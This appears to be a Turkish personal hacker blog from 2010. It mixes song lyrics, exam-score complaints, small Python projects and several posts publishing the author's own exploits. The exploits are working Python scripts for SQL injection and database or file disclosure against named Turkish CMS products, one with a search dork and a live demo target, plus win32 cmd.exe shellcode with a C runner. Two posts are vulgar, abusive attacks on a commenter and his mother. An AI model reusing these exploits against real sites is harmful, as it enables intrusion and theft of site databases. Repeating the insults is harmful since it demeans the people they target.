"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

27 Aralık 2010 Pazartesi

götün birine hitaben 2 / +18

öncelikle bi önceki yazımda kurduğum su cümleyi hatırlatarak yazıya başlıycam knowlits iti "umarın sevgili annenin kıymetini biliyosundur" bu cümleyi özellikle kurdum hassasiyetini merak ettim bu kadar alçalacağın aklıma bile gelmemişti la yarram iyi yada kötü yorum falan yazma küfredecem diyorum sen halen utanmadan yorum yazıyorsun emin ol ben bıkmam yazdığın her yorum için bir konu acarım bak bu kez büyüklüğü ben yapıcam küfretmiycem ama sen ısrarcı olursan bana küfret diye emin ol seni kırmam ;)

25 Aralık 2010 Cumartesi

götün birine hitaben / +18

bi önceki yazıma götün biri bi yorum yapmış nicki knowlits. la daşşağım sen (nesi)kimsin ki bana diyecek laf bulamayasın amın oğlu, şimdi bu yazıma senin annenle ilgili birçok etiket ekliycem bakalım dediğin gibi hit yapacak mı ? etiketleri özellikle oku göt bundan sonra yorum yaparken de unutma ben onaylamadıkça senin yazdıklarının hiç bi önemi yok sen her yorum yazdıkça annenle ilgili bir konu yayınlıycam haberin olsun umarın sevgili annenin kıymetini biliyosundur

24 Aralık 2010 Cuma

Anlayana

ne yazsam diye düşünürken gökhanımın yazısı gözüme çarptı bende sizlerle paylaşmak istedim gayet güzel bir yazı tabi anlayana ;)

"Dövüşeceksen aslanla dövüş, Aslan kavgadan kaçmaz.Dalaşacaksan bir kurtla dalaş,Saldıracaksa saldırır, çekinmez.Dağlarda kartala meydan oku,Kanatlarını gizleyemez.Akreple bile uğraşabilirsin,Zehri görünmese de, iğnesi görünür.Ama bir yılanla savaşma,Çünkü yılan kuytuda bekler, göremezsin.Zehri... ağzındadır, sokmadan bilemezsin.Güreşeceksen bir ayıyla güreş,Onun güreşi hilesizdir, oyun bilmez.Düşman arıyorsan, tilki gibi olsun,Onun silahı zekasıdır.Ama bir çakalla savaşma,Çünkü çakal sessiz gelir, göremezsin,Mertçe savaşmaz, yenemezsin.Bunların hepsi etrafında dolaşır,Tanıdıklarının yüzüne iyi bak, anlarsın.Ve unutma, yılan leylekten,Çakal değnekten korkar.Ya sende bu ikisinden korkuyorsundur,Ya da bu ikisi senden..."

Kaynak: http://gokhanlab.blogspot.com/2010/12/anlayana.html

16 Aralık 2010 Perşembe

Blogla(yama)mak

bu 2010 dan hiç bi halt anlamadım birşeyde yolunda gitmez mi yav :S bitsede kurtulsak a.q doğru dürüst entry bile giremiyoruz ne yazayım diye düşünüp duruyorum aslında artık eskisi gibi nete de giremiyorum :( gökhanım(bla) Tg'den ayrılmış, doktor kardeşim isyanlarda herkese küsmüş hayırdır inş :(

26 Kasım 2010 Cuma

Selam Aleyküm :)

Öldümde geldim :)) kpss 10-0 a.q sıçtı ağzımıza bıraktı 2 haftaya şoku anca atlattım sonuç şöyle 90 doğru 30 yanlış :( puan 82,090 genel sıralama 25 bin küsürlerde branş sıralamam 5 bin küsürlerde vs vs vs. oyüzden 10-0 ama ben bu kpss ye 90 dan bi gol atacam amına koyacam 2011 temmuzda ;)

12 Kasım 2010 Cuma

ösym

ösym klasını yine konusturdu :P sistem yine güm vay a.q :S

meraklı bekleyiş...

işte beklenen an geldi bakalım sonuclar nasıl olacak. hadi hayırlısı

4 Kasım 2010 Perşembe

Sefa Topsakal - Korkuyorum

amatör mamatör( o neyse artık ) ama sesi güzel kızın( her nekadar isim soyisim kız değilmiş gibi göstersede :)) )

Sefa Topsakal - Korkuyorum
Yükleyen HuzunlerinPrensi. - Yüksek çözünürlüklü video keyfini yaÅ�ayın!


Ağlamışsın yalan söyleme
Anlamışsın sevgisiz olmazmış
Özlemişsin elinde kalem
Mısralarında özlem ve sitem..

Becerememişsin birtanem
Yazılarından anladım..
Okudum çok ” özledim ”
Bende çok, çok ağladım..

inan birtanem, inanki
nefesini hayal ettim..
Avundum düşlerimle
Seni kendime inandırdım ben..

Korkuyorum sana söylemeye
ya beni sevmiyorsan eğer..
Ya beni reddedersen
işte o an bittim ben !

inan birtanem, inanki
ikimizi hayal ettim..
Avundum gülüşünle ,
Seni kendime inandırdım ben..

1 Kasım 2010 Pazartesi

Sınavınında ...

bu sınav berbattı eğitim iptal edilen sınavda 25 yanlış vardı bunda da 28 heralde yatar öğretmenlik işi :S gelde oku :((

29 Ekim 2010 Cuma

yildirimordulari.org / Dr.Ly0n

vay vay vay doktor kardeşim süprizim var dedi ve bombayı patlattı :) yildirimordulari.org yakında online ama hack sitesi olarak değil farklı projelerimiz var bakalım ya nasip, kardeşim teşekkürler, yılların rüyasını gerçekleştirdin doktor ;)

/Ekip: Dr.Ly0n, LifeSteaLeR, ZoRLu

26 Ekim 2010 Salı

str0ke a son mail / 08.08.2009






konu: Linux version 2.6.28-14-generic (gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu4) ) Kernel Memory Disclosure

kabul etmemişti hırt peşine bi resim gönderdim kanıt olarak, dediki tamamda yetki aşımı vs yok bu açık sayılmaz falan :D simdi resme baktım da linux yakıyor aga tema falan :D hey gidi günler hey gidi str0ke

25 Ekim 2010 Pazartesi

Numan Hadi - Dönmüyor

numan hadi dönmüyor | izlesene.com



dönmüyor dönmüyor sevdiğim dönmüyor

gitgide gelmiyor, sevdalım dönmüyor

dönmüyor dönmüyor sevdiğim dönmüyor

gitgide gelmiyor, sevdalım dönmüyor


yalnızım yalnızım bir bahtı karayım

bir kıza sevdalı yaralı adamım

23 Ekim 2010 Cumartesi

son bir hafta

haftaya pazar büyük gün(!) sınav giriş belgesi ulaştı elime :) dua edin arkadaşlar bu son şansımız. sınavın 31 ekimde olması da başka bir olay, tarihe bak a.q :D

11 Ekim 2010 Pazartesi

Özgür Akkuş / Gökhan Türkmen - Kayıp Şehir

dehşet bişey dinleyin pişman olmazsınız...



Ben gönlümü bir kere sana verdim
Ömrümü uğruna heder ettim
Son durak, liman seni seçtim
Vazgeçemiyorum..

Gururu, kibiri evde bıraktım
En yalın halimle sana aktım
Gözlerime bir kere ışık yaktın
Vazgeçemiyorum..

Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme umrumda değil..

Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme, Vazgeçemiyorum..
Ooof, sev sevme, Seni Seviyorum..

Gözlerim doluyor gecelerde
En yalın en küçük hecelerde
Dilimin ucuna geldiğinde
Söyleyemiyorum..
Zaman öyle akıp gidiyorken
Sana deli yüreğim biliyorken
Şeytan diyor ki dök dilinden
Söyleyemiyorum..

Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme umrumda değil..

Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme, Vazgeçemiyorum..
Ooof, sev sevme, Seni Seviyorum..

8 Ekim 2010 Cuma

mal bunlar :))



biraz önce exploit gönderdim explo(it)-db.com a mal bunlar a.q maili ZRL BGRHN diye almıştım direk o ada post edilmiş :)) ZRL BGRHN kim a.q yazmısım kocaman Author: ZoRLu diye :S vay a.q biz de kime gönderiyoruz exp falan bunlar bildiğin mal :D nerdesin str0ke :((

7 Ekim 2010 Perşembe

Nobel Akademi KPSS Eğitim Bilimleri Yaprak Test / Soru Bankası


kitabı çözünce eğitim sorularını fullerim düşüncesiyle alacaksanız almayın :P / onun formülü belli 10 bin dolarmış :S / piç kuruları
kitab konu çalışıp hemen peşine sorusunu çözerseniz pekiştirir çok salakça sorularda var ( buna sık sık rastlıyoruz ) çok düşündürücü güzel sorularda var ( buna nadir rastlıyoruz ) kötünün iyisi denebilir

Python Modül Downloader

python 2.5 / 2.6 için çok güzel bir uygulama ne diyor yeni nesil çok cix bi düşünce :PP

python 2.6 download:

http://www.python.org/ftp/python/2.6/python-2.6.msi

modül download for 2.6:

http://pypi.python.org/packages/2.6/s/setuptools/setuptools-0.6c11.win32-py2.6.exe

python 2.5 download:

http://www.python.org/ftp/python/2.5/python-2.5.msi

modül download for 2.5:

http://pypi.python.org/packages/2.5/s/setuptools/setuptools-0.6c11.win32-py2.5.exe

kurulum bittikten sonra pythonun kurulu olduğu dizine geliyoruz ben kendimden örnekle uyguluycam:



cd \python26\Scripts

easy_install markup /

markup modülün adı siz hangi modülü yüklemek istiyorsanız onu yazıyorsunuz

easy_install ImageTk gibi gibi



modüllere aşağıdaki adresten ulaşabilirsiniz:

http://pypi.python.org/simple/

Toygar Işıklı - Sen eşittir ben



Gün karanlıksa etrafın bulanıksa
Kaderin sana düşmansa benden çok da farklı değilsin
Yağmura saygın sonsuzsa aşka hiç inanmıyorsan
Zorla günleri sayıyorsan aynı kişi bile olabiliriz

Eminim bi gün senle buluşup bişeyler içeceğiz
Hatta belki eskileri anacağız dertleşeceğiz

En sevdiğin şarkı yalansa hayatının filmi hayatsa
Bi de hayatın tümüyle yalansa karşılaşmamız an meselesi
Hayatının kitabı mutluluksa sardunyaları mırıldanıyorsan
Deniz görmeden yaşayamıyorsan sen eşittir ben demektir..

Gün yol almışsa efkârın omzundaysa
Gözyaşın sana düşmansa benden çok da farklı değilsin
Yağmura aşkın sonsuzsa kalbinde saklanıyorsan
Zorla günleri sayıyorsan aynı hüznü bile duyabiliriz

Eminim bi gün senle buluşup bişeyler içeceğiz
Hatta belki eskileri anacağız dertleşeceğiz

En sevdiğin şarkı yalansa hayatının filmi hayatsa
Bi de hayatın tümüyle yalansa karşılaşmamız an meselesi
Hayatının kitabı mutluluksa sardunyaları mırıldanıyorsan
Deniz görmeden yaşayamıyorsan sen eşittir ben demektir

6 Ekim 2010 Çarşamba

Sinek Oyunu / Python - Tkinter

Epeydir Tkinterle uğrasmıyodum unutmusum küçük bi pratik :P
işte kodlamada kullanacağımız sinek:


Ekran Görüntüsü:


Kodlarımız:



#!/usr/bin/env python
#_*_coding:cp1254_*_

from Tkinter import *
import ImageTk, random

cam = Tk()
cam.geometry("400x400")
cam.tk_setPalette("black")
cam.title("Sinekli Bakkal")
cam.resizable(width=FALSE, height=FALSE)

def yakalayalim(event=None):
a = random.randint(0,300)
b = random.randint(0,300)
print a,b
puton.place(x=a,y=b)

resim = ImageTk.PhotoImage(file="sinek.jpg")
puton = Button(image=resim, command=yakalayalim, relief="flat")
puton.place(x=1,y=0)
puton.bind("",yakalayalim)

mainloop()

5 Ekim 2010 Salı

Pagerank ZoRgular





anca iki resim paylaşabildim fazla sorgulama yaptığım için site banladı sanırım :D basit bi kodlama iste ban kalkarsa baska görüntülerde eklerim :) Kullanıma dair diğer açıklamaları okumayı ihmal etmeyin

//Serefsiz Blogspot

blogspot kodları engelliyo isterseniz dosayı indirebilirsiniz

http://www.upload.gen.tr/d.php/s15/8tgvqbii/rank.rar.html


#!/usr/bin/env python
#-*- coding: cp1254 -*-

'''
Proje : Pagerank ZoRgular
Kodlama : ZoRLu
Site : http://z0rlu.blogspot.com
Site : http://inj3ct0r.com
Tarih : 05/10/2010
Sebep : Can Sıkıntısı :/
Dinlediğim Şarkı : http://www.youtube.com/watch?v=6Sa4rLt-WJA
Turkçe Karakter : Sorunun Çözümü için cmd penceresinde sağ tıkla > Özellikler > Yazı Tipi > Lucida Console Seç
Uyarı : Fazla Sorgulama Yapmayın Banlıyo Pezevenkler :))
Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
Python Version : 2.7 / http://python.org/ftp/python/2.7/python-2.7.msi
Lakirdi : Sınavınında ...
'''

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
import os
os.system(['clear','cls'][1])
os.system('color 2')
os.system('chcp 1254')
print "\t_______________________________________________________________"
print " "
print " \t\tPagerank ZoRgular "
print " "
print " \t\tKullanım: "
print " "
print " \t\tpython %s siteniz.com" % os.path.basename(sys.argv[0])
print " "
print "\t_______________________________________________________________"
sys.exit(1)


sitemiz = sys.argv[1]
pagerankgentr = "http://www.pagerank.gen.tr"
path = "/@pagerank/"
url = pagerankgentr + path + sitemiz


print "\nZoRgulanıyor..."
time.sleep(1)

print "\nSite: %s"% os.path.basename(sys.argv[1]);
time.sleep(2)

try:
Pagerank = urllib2.urlopen(url).read()
Pagerankcek = re.findall(r"

(.*)([0-9a-fA-F])(.*)

", Pagerank)
if len(Pagerankcek) > 0:
print "\nPagerank Değeriniz: " + Pagerankcek[0][0] + Pagerankcek[0][1]
time.sleep(1)

else:
print "\nPagerank Değeriniz Sorgulanamadı!"
sys.exit(1)



except urllib2.HTTPError:
print "Server Meşgul!"
sys.exit(1)

try:
Aciklama = urllib2.urlopen(url).read()
Aciklamacek = re.findall(r"Pagerank Değerinizin Açıklaması:
(.*)([0-9a-fA-F])(.*)", Aciklama)
if len(Aciklamacek) > 0:
print "\nPagerank Açiklaması: " + Aciklamacek[0][0] + Aciklamacek[0][1] + Aciklamacek[0][2]
time.sleep(1)


else:
print "\nAçıklama Sorgulaması Sorgulanamadı!"



except urllib2.HTTPError:
print "Server Meşgul!"


try:
Resim = urllib2.urlopen(url).read()
Resimcek = re.findall(r"
if len(Resimcek) > 0:
print "\nKayitli Resim: \n\n" + Resimcek[0][0] + Resimcek[0][1] + Resimcek[0][2]
time.sleep(2)

print "\nZoRgulama Tamamlandı!"
else:
print "\nKayıtlı Resim Sorgulanamadı!"


except urllib2.HTTPError:
print "Server Meşgul!"


meyra - cemil demirbakan - beni sensiz düşünme

meyra & cemil demirbakan - beni sensiz düşünme | izlesene.com




Asıl benim canım yanmış
Nasıl da tadım kaçmış
Takıldım masum yüzüne
Akıl ver çare nerde

Meğer benim bildiklerim
Kağıttan duvarlarmış
Düştüm bir gizin eşine
Malesef çare sende

İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama güven son sözüme
Beni sensiz düşünme

İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama inan son sözüme
Beni sensiz düşünme
Seni bensiz düşünme

Asıl benim canım yanmış
Nasıl da tadım kaçmış
Takıldım masum yüzüne
Akıl ver çare nerde

İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama güven son sözüme
Beni sensiz düşünme

İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama inan son sözüme
Beni sensiz düşünme
Seni bensiz hiç düşünme...

Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py)

http://inj3ct0r.com/exploits/14356
http://packetstormsecurity.org/1010-exploits/cilemhaber-disclose.txt
http://www.exploit-db.com/exploits/15199



#!/usr/bin/env python
#-*- coding:cp1254 -*-

'''
# Title : Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py)
# Down. Script : http://www.aspindir.com/indir.asp?id=3287&sIslem=%DDndir
# Proof : http://img718.imageshack.us/img718/7993/cilem.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 04/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Nasil Kullanabilirsiniz Bu Acigi ? Oda Bende Kalsin :))
'''

import sys, urllib2, re, os, time

def indiriyoruz(url):

import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()

if len(sys.argv) < 2:
import os
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

''' link kontrol 1 '''

add = "http://"
add2 = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "db/cilemhaber.mdb"
url2 = sitemiz + vulnfile

''' link kontrol 2 '''

try:
adreskontrol = urllib2.urlopen(url2).read()

if len(adreskontrol) > 0:

print "\nGood Job Bro!"

except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)


''' dosya indiriliyor '''

if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'


Abhimanyu Infotech (show_news.php id) SQL Injection Exploit

http://inj3ct0r.com/exploits/14357
http://packetstormsecurity.org/1010-exploits/abhimanyu-sql.txt



#!/usr/bin/env python
#-*- coding:utf-8 -*-

'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Title : Abhimanyu Infotech (show_news.php id) SQL Injection Exploit (.py)
# Demo : http://soumyampl.com/index1.php?file=show_news.php&id=2 // has a lfi too :))
# Proof : http://img715.imageshack.us/img715/297/sqlo.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 04/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Gecmiyorum Zaman a.k :/
# Dork : intext:"Designed" "Abhimanyu Infotech"
'''

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Abhimanyu Infotech SQL Inj Exploit (.py) "
print " "
print " Coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "show_news.php"
sql = "?id=0000+union+select+1,2,3,concat(0x3a3a3a,database(),0x3a3a3a)"
url = sitemiz + vulnfile + sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "database(): " + aliver[0][0] + aliver[0][1] +aliver[0][2]

print "\nGood Job Bro!"
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"

2 Ekim 2010 Cumartesi

seyfi doğanay - bul beni



ben yaralı ceylanım dağlarda
avcı olup düş peşime bul beni
kipriğini şu gönlüme ok eyle
sol yanımın üzerinden vur beni

alacaksan al canımı ses etmem
kıydın diye beni sana küs etmem
ben seversem kolay kolay pes etmem
boynum sana kıldan ince vur beni

bu nasıl bir sevda geldi başıma
aşılmaz dağlara saldın yar beni
gecemi gündüze kattım yollarda
kurda kuşa yem olmadan bul beni

alacaksan al canımı ses etmem
kıydın diye beni sana küs etmem
ben seversem kolay kolay pes etmem
boynum sana kıldan ince vur beni

Seyfi Doğanay

Bka Haber v1.0 (Tr) File Disclosure Exploit (.py)

http://www.exploit-db.com/exploits/15183/



#!/usr/bin/env python
#-*- coding:cp1254 -*-

'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Title : Bka Haber v1.0 (Tr) File Disclosure Exploit (.py)
# Desc. : its not Database
# Down. Script : http://www.scriptci.com/modules.php?name=Downloads&d_op=getit&lid=475
# Proof : http://img822.imageshack.us/img822/3568/filedisc.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 02/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Okudugumuz icin Cezalandiran Sisteme Sarkitiyim / 3227 Orrospu Cocugu Yakinda Sinemalarda :P
# Lakirdi : off ulan off / http://www.youtube.com/watch?v=RV7Wj0KKVxo
'''

import sys, urllib2, re, os, time

def indiriyoruz(url):

import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()

if len(sys.argv) < 2:
import os
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Bka Haber v1.0 (Tr) File Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

''' link kontrol 1 '''

add = "http://"
add2 = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "db/haber.mdb"
url2 = sitemiz + vulnfile

''' link kontrol 2 '''

try:
adreskontrol = urllib2.urlopen(url2).read()

if len(adreskontrol) > 0:

print "\nGood Job Bro!"

except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)


''' dosya indiriliyor '''

if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'

1 Ekim 2010 Cuma

explo(it)-db.com

gönderiyorum maili post ediliyor bakıyorum onaylanmısta sonra hoba silindi hemen gönderdim bi mail dedim malmısınız olum bu ne gevşeklik :PP şakası bir yana gönderdiğim exploit, shellcode yada buglardan bazılarını tınmadılar bazılarını da post edip sonra sildiler 1,3,5 derken baktım böyle olmuyor gönderdim bir mail:

soru:

dedim nerde hata yapıyorum söyleyin biliyim önce yayınlayıp sonra silmenize sebep nedir lütfen yanlışımı bildirin düzeltmek istiyorum

el cevap:

seni şaşırttığımız için üzgünüz, herhangi bir hatanız yok biz bind shell, add admin account shell vs vs tarzında shellcode istiyoruz


// bununda tek bir açıklaması var am buldunuz kıllısını istiyorsunuz :/

// of str0ke nerdesin yav :((

win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes

http://inj3ct0r.com/exploits/14298
http://packetstormsecurity.org/shellcode/win32cmd-shellcode.txt
http://shell-storm.org/shellcode/files/shellcode-710.php


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Title : win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes
# Proof : http://img36.imageshack.us/img36/1183/cmdm.jpg
# Plat. : win32 / windows
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 01/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Okudugumuz icin Cezalandiran Sistemin amina koyim / Kpss Anani ...
# Lakirdi : Son 31 Gun


#include
#include
#include

int main(){

unsigned char shellcode[]=
"\x31\xc0\xeb\x13\x5b\x88\x43\x0e\x53\xbb\xad\x23\x86\x7c\xff\xd3\xbb"
"\xfa\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
"\x65\x20\x2f\x63\x20\x63\x6d\x64";

printf("Size = %d bytes\n", strlen(shellcode));

((void (*)())shellcode)();



return 0;
}

win32/xp sp3 (Tr) About Box Shellcode 77 bytes

http://inj3ct0r.com/exploits/14270
http://packetstormsecurity.org/shellcode/winabout-shellcode.txt
http://www.exploit-db.com/exploits/15170/





1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
